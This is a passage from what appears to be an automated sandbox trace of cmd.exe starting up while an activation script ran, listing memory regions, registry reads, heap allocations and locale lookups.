end_va = 0x1271ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001271f00000" filename = "" Region: id = 1183 start_va = 0x130b3fd0000 end_va = 0x130b41affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000130b3fd0000" filename = "" Region: id = 1184 start_va = 0x130b3d30000 end_va = 0x130b3d36fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000130b3d30000" filename = "" Region: id = 1185 start_va = 0x130b3d90000 end_va = 0x130b3d96fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000130b3d90000" filename = "" Region: id = 1186 start_va = 0x130b3e10000 end_va = 0x130b3f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000130b3e10000" filename = "" Region: id = 1187 start_va = 0x130b41b0000 end_va = 0x130b44e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 54 os_tid = 0xcd8 [0176.613] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff7bd6f0000 [0176.613] __set_app_type (_Type=0x1) [0176.613] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff7bd705700) returned 0x0 [0176.613] __getmainargs (in: _Argc=0x7ff7bd720108, _Argv=0x7ff7bd720110, _Env=0x7ff7bd720118, _DoWildCard=0, _StartInfo=0x7ff7bd720124 | out: _Argc=0x7ff7bd720108, _Argv=0x7ff7bd720110, _Env=0x7ff7bd720118) returned 0 [0176.614] GetCurrentThreadId () returned 0xcd8 [0176.614] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcd8) returned 0x6c [0176.614] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffbed570000 [0176.614] GetProcAddress (hModule=0x7ffbed570000, lpProcName="SetThreadUILanguage") returned 0x7ffbed593270 [0176.614] SetThreadUILanguage (LangId=0x0) returned 0x409 [0176.620] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0176.620] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1271eff9f8 | out: phkResult=0x1271eff9f8*=0x0) returned 0x2 [0176.620] VirtualQuery (in: lpAddress=0x1271eff9e4, lpBuffer=0x1271eff960, dwLength=0x30 | out: lpBuffer=0x1271eff960*(BaseAddress=0x1271eff000, AllocationBase=0x1271e00000, AllocationProtect=0x4, __alignment1=0xfffff803, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0176.620] VirtualQuery (in: lpAddress=0x1271e00000, lpBuffer=0x1271eff960, dwLength=0x30 | out: lpBuffer=0x1271eff960*(BaseAddress=0x1271e00000, AllocationBase=0x1271e00000, AllocationProtect=0x4, __alignment1=0xfffff803, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0176.620] VirtualQuery (in: lpAddress=0x1271e01000, lpBuffer=0x1271eff960, dwLength=0x30 | out: lpBuffer=0x1271eff960*(BaseAddress=0x1271e01000, AllocationBase=0x1271e00000, AllocationProtect=0x4, __alignment1=0xfffff803, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0176.620] VirtualQuery (in: lpAddress=0x1271e04000, lpBuffer=0x1271eff960, dwLength=0x30 | out: lpBuffer=0x1271eff960*(BaseAddress=0x1271e04000, AllocationBase=0x1271e00000, AllocationProtect=0x4, __alignment1=0xfffff803, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0176.620] VirtualQuery (in: lpAddress=0x1271f00000, lpBuffer=0x1271eff960, dwLength=0x30 | out: lpBuffer=0x1271eff960*(BaseAddress=0x1271f00000, AllocationBase=0x1271f00000, AllocationProtect=0x4, __alignment1=0xfffff803, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0176.620] GetConsoleOutputCP () returned 0x1b5 [0176.621] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0176.621] SetConsoleCtrlHandler (HandlerRoutine=0x7ff7bd712ad0, Add=1) returned 1 [0176.621] _get_osfhandle (_FileHandle=1) returned 0x98 [0176.621] SetConsoleMode (hConsoleHandle=0x98, dwMode=0x0) returned 0 [0176.621] _get_osfhandle (_FileHandle=1) returned 0x98 [0176.621] GetConsoleMode (in: hConsoleHandle=0x98, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 0 [0176.621] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.621] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0176.622] GetEnvironmentStringsW () returned 0x130b3e15760* [0176.622] GetProcessHeap () returned 0x130b3e10000 [0176.622] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0xbee) returned 0x130b3e16360 [0176.622] memcpy (in: _Dst=0x130b3e16360, _Src=0x130b3e15760, _Size=0xbee | out: _Dst=0x130b3e16360) returned 0x130b3e16360 [0176.622] FreeEnvironmentStringsA (penv="=") returned 1 [0176.622] GetProcessHeap () returned 0x130b3e10000 [0176.622] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x8) returned 0x130b3e121c0 [0176.622] GetEnvironmentStringsW () returned 0x130b3e15760* [0176.622] GetProcessHeap () returned 0x130b3e10000 [0176.622] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0xbee) returned 0x130b3e16f60 [0176.622] memcpy (in: _Dst=0x130b3e16f60, _Src=0x130b3e15760, _Size=0xbee | out: _Dst=0x130b3e16f60) returned 0x130b3e16f60 [0176.622] FreeEnvironmentStringsA (penv="=") returned 1 [0176.622] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1271efe8a8 | out: phkResult=0x1271efe8a8*=0x78) returned 0x0 [0176.622] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1271efe8a0, lpData=0x1271efe8c0, lpcbData=0x1271efe8a4*=0x1000 | out: lpType=0x1271efe8a0*=0x0, lpData=0x1271efe8c0*=0x0, lpcbData=0x1271efe8a4*=0x1000) returned 0x2 [0176.623] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1271efe8a0, lpData=0x1271efe8c0, lpcbData=0x1271efe8a4*=0x1000 | out: lpType=0x1271efe8a0*=0x4, lpData=0x1271efe8c0*=0x1, lpcbData=0x1271efe8a4*=0x4) returned 0x0 [0176.623] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1271efe8a0, lpData=0x1271efe8c0, lpcbData=0x1271efe8a4*=0x1000 | out: lpType=0x1271efe8a0*=0x0, lpData=0x1271efe8c0*=0x1, lpcbData=0x1271efe8a4*=0x1000) returned 0x2 [0176.623] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1271efe8a0, lpData=0x1271efe8c0, lpcbData=0x1271efe8a4*=0x1000 | out: lpType=0x1271efe8a0*=0x4, lpData=0x1271efe8c0*=0x0, lpcbData=0x1271efe8a4*=0x4) returned 0x0 [0176.623] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1271efe8a0, lpData=0x1271efe8c0, lpcbData=0x1271efe8a4*=0x1000 | out: lpType=0x1271efe8a0*=0x4, lpData=0x1271efe8c0*=0x40, lpcbData=0x1271efe8a4*=0x4) returned 0x0 [0176.623] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1271efe8a0, lpData=0x1271efe8c0, lpcbData=0x1271efe8a4*=0x1000 | out: lpType=0x1271efe8a0*=0x4, lpData=0x1271efe8c0*=0x40, lpcbData=0x1271efe8a4*=0x4) returned 0x0 [0176.623] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1271efe8a0, lpData=0x1271efe8c0, lpcbData=0x1271efe8a4*=0x1000 | out: lpType=0x1271efe8a0*=0x0, lpData=0x1271efe8c0*=0x40, lpcbData=0x1271efe8a4*=0x1000) returned 0x2 [0176.623] RegCloseKey (hKey=0x78) returned 0x0 [0176.623] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1271efe8a8 | out: phkResult=0x1271efe8a8*=0x78) returned 0x0 [0176.623] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1271efe8a0, lpData=0x1271efe8c0, lpcbData=0x1271efe8a4*=0x1000 | out: lpType=0x1271efe8a0*=0x0, lpData=0x1271efe8c0*=0x40, lpcbData=0x1271efe8a4*=0x1000) returned 0x2 [0176.623] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1271efe8a0, lpData=0x1271efe8c0, lpcbData=0x1271efe8a4*=0x1000 | out: lpType=0x1271efe8a0*=0x4, lpData=0x1271efe8c0*=0x1, lpcbData=0x1271efe8a4*=0x4) returned 0x0 [0176.623] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1271efe8a0, lpData=0x1271efe8c0, lpcbData=0x1271efe8a4*=0x1000 | out: lpType=0x1271efe8a0*=0x0, lpData=0x1271efe8c0*=0x1, lpcbData=0x1271efe8a4*=0x1000) returned 0x2 [0176.623] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1271efe8a0, lpData=0x1271efe8c0, lpcbData=0x1271efe8a4*=0x1000 | out: lpType=0x1271efe8a0*=0x4, lpData=0x1271efe8c0*=0x0, lpcbData=0x1271efe8a4*=0x4) returned 0x0 [0176.623] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1271efe8a0, lpData=0x1271efe8c0, lpcbData=0x1271efe8a4*=0x1000 | out: lpType=0x1271efe8a0*=0x4, lpData=0x1271efe8c0*=0x9, lpcbData=0x1271efe8a4*=0x4) returned 0x0 [0176.623] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1271efe8a0, lpData=0x1271efe8c0, lpcbData=0x1271efe8a4*=0x1000 | out: lpType=0x1271efe8a0*=0x4, lpData=0x1271efe8c0*=0x9, lpcbData=0x1271efe8a4*=0x4) returned 0x0 [0176.623] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1271efe8a0, lpData=0x1271efe8c0, lpcbData=0x1271efe8a4*=0x1000 | out: lpType=0x1271efe8a0*=0x0, lpData=0x1271efe8c0*=0x9, lpcbData=0x1271efe8a4*=0x1000) returned 0x2 [0176.623] RegCloseKey (hKey=0x78) returned 0x0 [0176.623] time (in: timer=0x0 | out: timer=0x0) returned 0x662cc6e7 [0176.623] srand (_Seed=0x662cc6e7) [0176.623] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c echo prompt $E | cmd" [0176.624] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c echo prompt $E | cmd" [0176.624] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff7bd731940 | out: lpBuffer="C:\\Windows\\System32") returned 0x13 [0176.624] GetProcessHeap () returned 0x130b3e10000 [0176.624] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x218) returned 0x130b3e17b90 [0176.624] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x130b3e17ba0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0176.624] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0176.624] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0176.624] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x4 [0176.624] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0176.624] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0176.624] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0176.624] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0176.624] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0176.624] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0176.624] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0176.624] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0176.624] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0176.624] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0176.624] GetProcessHeap () returned 0x130b3e10000 [0176.624] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x38) returned 0x130b3e17db0 [0176.625] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1271eff6b0 | out: lpBuffer="C:\\Windows\\System32") returned 0x13 [0176.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32", nBufferLength=0x104, lpBuffer=0x1271eff6b0, lpFilePart=0x1271eff690 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x1271eff690*="System32") returned 0x13 [0176.625] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0176.626] FindFirstFileW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), lpFindFileData=0x1271eff3c0 | out: lpFindFileData=0x1271eff3c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x130b3e10720 [0176.626] FindClose (in: hFindFile=0x130b3e10720 | out: hFindFile=0x130b3e10720) returned 1 [0176.626] memcpy (in: _Dst=0x1271eff6b6, _Src=0x1271eff3ec, _Size=0xe | out: _Dst=0x1271eff6b6) returned 0x1271eff6b6 [0176.626] FindFirstFileW (in: lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32"), lpFindFileData=0x1271eff3c0 | out: lpFindFileData=0x1271eff3c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x130b3e10720 [0176.626] FindClose (in: hFindFile=0x130b3e10720 | out: hFindFile=0x130b3e10720) returned 1 [0176.626] memcpy (in: _Dst=0x1271eff6c6, _Src=0x1271eff3ec, _Size=0x10 | out: _Dst=0x1271eff6c6) returned 0x1271eff6c6 [0176.626] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0176.626] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0176.627] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0176.627] GetProcessHeap () returned 0x130b3e10000 [0176.627] RtlFreeHeap (HeapHandle=0x130b3e10000, Flags=0x0, BaseAddress=0x130b3e16360) returned 1 [0176.627] GetEnvironmentStringsW () returned 0x130b3e15f70* [0176.627] GetProcessHeap () returned 0x130b3e10000 [0176.627] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0xbee) returned 0x130b3e19aa0 [0176.627] memcpy (in: _Dst=0x130b3e19aa0, _Src=0x130b3e15f70, _Size=0xbee | out: _Dst=0x130b3e19aa0) returned 0x130b3e19aa0 [0176.627] FreeEnvironmentStringsA (penv="=") returned 1 [0176.627] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff7bd731940 | out: lpBuffer="C:\\Windows\\System32") returned 0x13 [0176.628] GetProcessHeap () returned 0x130b3e10000 [0176.628] RtlFreeHeap (HeapHandle=0x130b3e10000, Flags=0x0, BaseAddress=0x130b3e17db0) returned 1 [0176.628] GetProcessHeap () returned 0x130b3e10000 [0176.628] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x4016) returned 0x130b3e1a6a0 [0176.628] GetProcessHeap () returned 0x130b3e10000 [0176.628] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x3e) returned 0x130b3e10720 [0176.628] GetProcessHeap () returned 0x130b3e10000 [0176.629] RtlFreeHeap (HeapHandle=0x130b3e10000, Flags=0x0, BaseAddress=0x130b3e1a6a0) returned 1 [0176.629] GetConsoleOutputCP () returned 0x1b5 [0176.630] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0176.630] GetUserDefaultLCID () returned 0x409 [0176.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff7bd72d6a0, cchData=8 | out: lpLCData=":") returned 2 [0176.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1271eff7e0, cchData=128 | out: lpLCData="0") returned 2 [0176.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1271eff7e0, cchData=128 | out: lpLCData="0") returned 2 [0176.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1271eff7e0, cchData=128 | out: lpLCData="1") returned 2 [0176.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff7bd72d6b0, cchData=8 | out: lpLCData="/") returned 2 [0176.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff7bd72d700, cchData=32 | out: lpLCData="Mon") returned 4 [0176.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff7bd72d740, cchData=32 | out: lpLCData="Tue") returned 4 [0176.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff7bd72d780, cchData=32 | out: lpLCData="Wed") returned 4 [0176.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff7bd72d7c0, cchData=32 | out: lpLCData="Thu") returned 4 [0176.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff7bd72d800, cchData=32 | out: lpLCData="Fri") returned 4 [0176.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff7bd72d840, cchData=32 | out: lpLCData="Sat") returned 4 [0176.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff7bd72d880, cchData=32 | out: lpLCData="Sun") returned 4 [0176.631] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff7bd72d6c0, cchData=8 | out: lpLCData=".") returned 2 [0176.631] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff7bd72d6e0, cchData=8 | out: lpLCData=",") returned 2 [0176.631] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0176.632] GetProcessHeap () returned 0x130b3e10000 [0176.632] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x0, Size=0x20c) returned 0x130b3e15f70 [0176.632] GetConsoleTitleW (in: lpConsoleTitle=0x130b3e15f70, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0176.633] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffbed570000 [0176.633] GetProcAddress (hModule=0x7ffbed570000, lpProcName="CopyFileExW") returned 0x7ffbed598940 [0176.633] GetProcAddress (hModule=0x7ffbed570000, lpProcName="IsDebuggerPresent") returned 0x7ffbed597460 [0176.633] GetProcAddress (hModule=0x7ffbed570000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffbea416e50 [0176.633] GetProcessHeap () returned 0x130b3e10000 [0176.633] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x4012) returned 0x130b3e1a6a0 [0176.633] GetProcessHeap () returned 0x130b3e10000 [0176.634] RtlFreeHeap (HeapHandle=0x130b3e10000, Flags=0x0, BaseAddress=0x130b3e1a6a0) returned 1 [0176.634] _wcsicmp (_String1="echo", _String2=")") returned 60 [0176.634] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0176.634] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0176.634] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0176.634] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0176.634] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0176.634] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0176.634] GetProcessHeap () returned 0x130b3e10000 [0176.634] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0xb0) returned 0x130b3e16190 [0176.634] GetProcessHeap () returned 0x130b3e10000 [0176.634] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x1a) returned 0x130b3e17db0 [0176.635] GetProcessHeap () returned 0x130b3e10000 [0176.635] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x28) returned 0x130b3e107e0 [0176.635] GetProcessHeap () returned 0x130b3e10000 [0176.635] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0xb0) returned 0x130b3e16250 [0176.635] _wcsicmp (_String1="FOR", _String2="cmd") returned 3 [0176.636] _wcsicmp (_String1="FOR/?", _String2="cmd") returned 3 [0176.636] _wcsicmp (_String1="IF", _String2="cmd") returned 6 [0176.636] _wcsicmp (_String1="IF/?", _String2="cmd") returned 6 [0176.636] _wcsicmp (_String1="REM", _String2="cmd") returned 15 [0176.636] _wcsicmp (_String1="REM/?", _String2="cmd") returned 15 [0176.636] GetProcessHeap () returned 0x130b3e10000 [0176.636] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0xb0) returned 0x130b3e16310 [0176.636] GetProcessHeap () returned 0x130b3e10000 [0176.636] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x18) returned 0x130b3e10810 [0176.637] GetProcessHeap () returned 0x130b3e10000 [0176.637] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x48) returned 0x130b3e163d0 [0176.637] _pipe (in: _PtHandles=0x130b3e163e0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x130b3e163e0) returned 0 [0176.637] _dup (_FileHandle=1) returned 5 [0176.637] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0176.637] _close (_FileHandle=4) returned 0 [0176.637] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0176.637] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0176.638] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0176.638] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0176.638] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0176.638] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0176.638] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0176.638] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0176.638] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0176.638] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0176.638] GetProcessHeap () returned 0x130b3e10000 [0176.638] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x4010) returned 0x130b3e1a6a0 [0176.638] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0176.638] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0176.638] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0176.638] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0176.638] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0176.638] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0176.638] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0176.638] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0176.638] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0176.638] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0176.638] GetProcessHeap () returned 0x130b3e10000 [0176.638] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0xb0) returned 0x130b3e16420 [0176.638] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0176.638] GetProcessHeap () returned 0x130b3e10000 [0176.638] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x28) returned 0x130b3e164e0 [0176.638] GetProcessHeap () returned 0x130b3e10000 [0176.638] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x218) returned 0x130b3e16510 [0176.638] GetProcessHeap () returned 0x130b3e10000 [0176.638] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x80) returned 0x130b3e16730 [0176.639] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0176.639] GetProcessHeap () returned 0x130b3e10000 [0176.639] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x420) returned 0x130b3e167c0 [0176.639] SetErrorMode (uMode=0x0) returned 0x0 [0176.639] SetErrorMode (uMode=0x1) returned 0x0 [0176.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0x130b3e167d0, lpFilePart=0x1271eff310 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1271eff310*="system32") returned 0x13 [0176.639] SetErrorMode (uMode=0x0) returned 0x1 [0176.639] GetProcessHeap () returned 0x130b3e10000 [0176.639] RtlReAllocateHeap (Heap=0x130b3e10000, Flags=0x0, Ptr=0x130b3e167c0, Size=0x48) returned 0x130b3e167c0 [0176.639] GetProcessHeap () returned 0x130b3e10000 [0176.639] RtlSizeHeap (HeapHandle=0x130b3e10000, Flags=0x0, MemoryPointer=0x130b3e167c0) returned 0x48 [0176.639] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0176.639] GetProcessHeap () returned 0x130b3e10000 [0176.639] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x3e) returned 0x130b3e16820 [0176.639] GetProcessHeap () returned 0x130b3e10000 [0176.639] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x68) returned 0x130b3e16870 [0176.640] GetProcessHeap () returned 0x130b3e10000 [0176.640] RtlReAllocateHeap (Heap=0x130b3e10000, Flags=0x0, Ptr=0x130b3e16870, Size=0x3e) returned 0x130b3e16870 [0176.640] GetProcessHeap () returned 0x130b3e10000 [0176.640] RtlSizeHeap (HeapHandle=0x130b3e10000, Flags=0x0, MemoryPointer=0x130b3e16870) returned 0x3e [0176.640] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0176.640] GetProcessHeap () returned 0x130b3e10000 [0176.640] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0xfc) returned 0x130b3e168c0 [0176.644] GetProcessHeap () returned 0x130b3e10000 [0176.644] RtlReAllocateHeap (Heap=0x130b3e10000, Flags=0x0, Ptr=0x130b3e168c0, Size=0x88) returned 0x130b3e168c0 [0176.644] GetProcessHeap () returned 0x130b3e10000 [0176.644] RtlSizeHeap (HeapHandle=0x130b3e10000, Flags=0x0, MemoryPointer=0x130b3e168c0) returned 0x88 [0176.645] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0176.645] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe"), fInfoLevelId=0x1, lpFindFileData=0x1271eff090, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1271eff090) returned 0x130b3e16960 [0176.646] GetProcessHeap () returned 0x130b3e10000 [0176.646] RtlAllocateHeap 